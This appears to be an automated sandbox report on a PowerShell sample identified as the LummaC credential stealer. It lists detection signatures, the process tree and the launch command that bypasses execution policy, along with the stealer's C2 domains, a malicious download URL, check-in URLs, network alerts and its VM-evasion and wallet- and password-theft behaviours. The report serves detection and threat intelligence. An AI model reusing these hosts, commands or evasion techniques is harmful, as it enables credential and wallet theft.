Edit tour

Windows Analysis Report
get_txt.ps1

Overview

General Information

Sample name:	get_txt.ps1
Analysis ID:	1617749
MD5:	f25c7e9b98323f2f5347a8d11175130e
SHA1:	e41c6b2970bbd531da88b1f289ee659204219a32
SHA256:	99e4a0db55e1dc5a83ec18db0daf104104423abd277e568b6324be4da1c1ec27
Tags:	91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6128 cmdline: "C:\Windows\Temp\cmd.exe" MD5: 6D5CEBDE81333A9A52AF275D3BCA0997)

notepad.exe (PID: 2444 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\get_txt.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["healthyjouprney.tech", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\cmd.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000A.00000003.2043952153.0000000000C12000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000A.00000003.1900062154.00000000029A4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: cmd.exe PID: 6128	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: cmd.exe PID: 6128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cmd.exe PID: 6128	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
10.3.cmd.exe.c50000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.2.cmd.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.3.cmd.exe.c50000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
10.0.cmd.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", ProcessId: 4904, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", ProcessId: 4904, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:30:25.987634+0100	2028371	3	Unknown Traffic	192.168.2.7	49974	188.114.97.3	443	TCP
2025-02-18T08:30:26.959819+0100	2028371	3	Unknown Traffic	192.168.2.7	49975	188.114.97.3	443	TCP
2025-02-18T08:30:28.719659+0100	2028371	3	Unknown Traffic	192.168.2.7	49976	188.114.97.3	443	TCP
2025-02-18T08:30:36.417594+0100	2028371	3	Unknown Traffic	192.168.2.7	49977	188.114.97.3	443	TCP
2025-02-18T08:30:37.958391+0100	2028371	3	Unknown Traffic	192.168.2.7	49978	188.114.97.3	443	TCP
2025-02-18T08:30:39.474358+0100	2028371	3	Unknown Traffic	192.168.2.7	49979	188.114.97.3	443	TCP
2025-02-18T08:30:41.751362+0100	2028371	3	Unknown Traffic	192.168.2.7	49980	188.114.97.3	443	TCP
2025-02-18T08:30:44.008622+0100	2028371	3	Unknown Traffic	192.168.2.7	49981	188.114.97.3	443	TCP

ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:24.779520+0100	2021697	1	A Network Trojan was detected	192.168.2.7	49702	35.208.212.94	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:30:26.454750+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49974	188.114.97.3	443	TCP
2025-02-18T08:30:27.315608+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49975	188.114.97.3	443	TCP
2025-02-18T08:30:44.485010+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49981	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:30:26.454750+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49974	188.114.97.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:30:39.927272+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49979	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:33.430247+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49749	91.206.178.120	5001	TCP

ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:23.794974+0100	2860232	1	Malware Command and Control Activity Detected	192.168.2.7	49701	91.206.178.120	5001	TCP

ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:23.794995+0100	2860233	1	Malware Command and Control Activity Detected	91.206.178.120	5001	192.168.2.7	49701	TCP

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:24.821515+0100	1810003	2	Potentially Bad Traffic	35.208.212.94	443	192.168.2.7	49702	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T08:29:21.073809+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49700	104.26.13.205	80	TCP
2025-02-18T08:29:23.794974+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49701	91.206.178.120	5001	TCP
2025-02-18T08:29:24.779520+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49702	35.208.212.94	443	TCP
2025-02-18T08:29:33.430247+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49749	91.206.178.120	5001	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.206.178.120:5001/script_end?random_number=$randomNumber	Avira URL Cloud: Label: malware
Source: https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exe	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=29634$M	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=29634	Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["healthyjouprney.tech", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\cmd.exe

ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: get_txt.ps1

Virustotal: Detection: 13%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: healthyjouprney.tech
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: nestlecompany.world
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: mercharena.biz
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: generalmills.pro
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: stormlegue.com
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: blast-hubs.com
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: blastikcn.com
Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: nestlecompany.pro

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_004197EB CryptUnprotectData,

10_2_004197EB

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Windows\Temp\cmd.exe

Unpacked PE file: 10.2.cmd.exe.400000.0.unpack

Source: unknown	HTTPS traffic detected: 35.208.212.94:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49981 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Windows\Temp\cmd.exe

Code function: 10_2_02653ECD lstrcpyW,lstrcpyW,lstrcatW,FindFirstFileW,PathRemoveFileSpecW,lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,CreateDirectoryW,lstrcatW,lstrcatW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,lstrcatW,CopyFileExW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,

10_2_02653ECD

Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	10_2_00419070
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_0042977A
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then lea eax, dword ptr [esp+000002D4h]	10_2_004197EB
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-000000EBh]	10_2_00443790
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	10_2_00425BA0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-5BFBFFF6h]	10_2_00412C13
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-000000AAh]	10_2_0040FFF0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_00433FF6
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_0043D0C0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_0042B120
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov word ptr [edi], cx	10_2_00427130
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ebp, eax	10_2_004471E0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_004301F0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	10_2_0041B26C
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	10_2_0040A2D0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	10_2_0040A2D0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov edi, dword ptr [esp+20h]	10_2_00410280
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then push eax	10_2_0044529F
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_0043430A
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], al	10_2_0043430A
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [edi], bl	10_2_0040C310
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_004343C2
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], al	10_2_004343C2
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+50h]	10_2_0042C388
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_004343B2
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], al	10_2_004343B2
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_00432479
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5Ch]	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	10_2_0041E4A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_0042F6A0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	10_2_00431720
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+esi]	10_2_004027C0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	10_2_0041D7BF
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, word ptr [ecx]	10_2_0041D7BF
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h]	10_2_0042C870
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+47h]	10_2_0042C870
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov dword ptr [esi+eax], 00000000h	10_2_0042C870
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6E74889Ah	10_2_004128D3
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6E74889Ah	10_2_004128D3
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	10_2_0040A8F0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+021D28A5h]	10_2_0042C890
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then lea eax, dword ptr [esp+000002D4h]	10_2_0041989B
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov esi, edx	10_2_0041A94D
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	10_2_00423960
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_0043297D
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], cl	10_2_00432917
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [esi], al	10_2_00432917
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+00000174h]	10_2_004349C6
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov edx, ecx	10_2_004439E0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_004323F9
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then lea ecx, dword ptr [eax+eax]	10_2_0040CA50
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov edx, ecx	10_2_0040CA50
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000000C0h]	10_2_0042EA60
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then push eax	10_2_00410A76
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [eax], bl	10_2_00410A76
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, word ptr [esi]	10_2_00446AE0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+eax-000000C0h]	10_2_0042EA60
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+200415BEh]	10_2_0041FC5E
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov esi, eax	10_2_00445515
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_0042ACF4
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	10_2_00426CA0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-035FA4E5h]	10_2_00426CA0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ecx, eax	10_2_0042ACAC
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3949D1B0h]	10_2_0040DD03
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov edx, esi	10_2_00434DE3
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov edx, esi	10_2_00434DE3
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	10_2_00443DB0
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ebp, eax	10_2_00446DB9
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+04h]	10_2_00443E50
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov ebp, eax	10_2_00446E30
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_0041AECF
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+54h]	10_2_00432ECD
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+40C27F55h]	10_2_00419ED9
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov dword ptr [esp+0000009Ch], 00000000h	10_2_0041CE95
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then mov byte ptr [eax], cl	10_2_0041BF01
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 61A44046h	10_2_0041BF17
Source: C:\Windows\Temp\cmd.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	10_2_00418FB0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.7:49701 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.7:49701
Source: Network traffic	Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.7:49702 -> 35.208.212.94:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49981 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49979 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49975 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49974 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49974 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: healthyjouprney.tech
Source: Malware configuration extractor	URLs: nestlecompany.world
Source: Malware configuration extractor	URLs: mercharena.biz
Source: Malware configuration extractor	URLs: generalmills.pro
Source: Malware configuration extractor	URLs: stormlegue.com
Source: Malware configuration extractor	URLs: blast-hubs.com
Source: Malware configuration extractor	URLs: blastikcn.com
Source: Malware configuration extractor	URLs: nestlecompany.pro

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49749

Source: global traffic

TCP traffic: 192.168.2.7:49701 -> 91.206.178.120:5001

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: ARTNET2PL ARTNET2PL

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49701 -> 91.206.178.120:5001
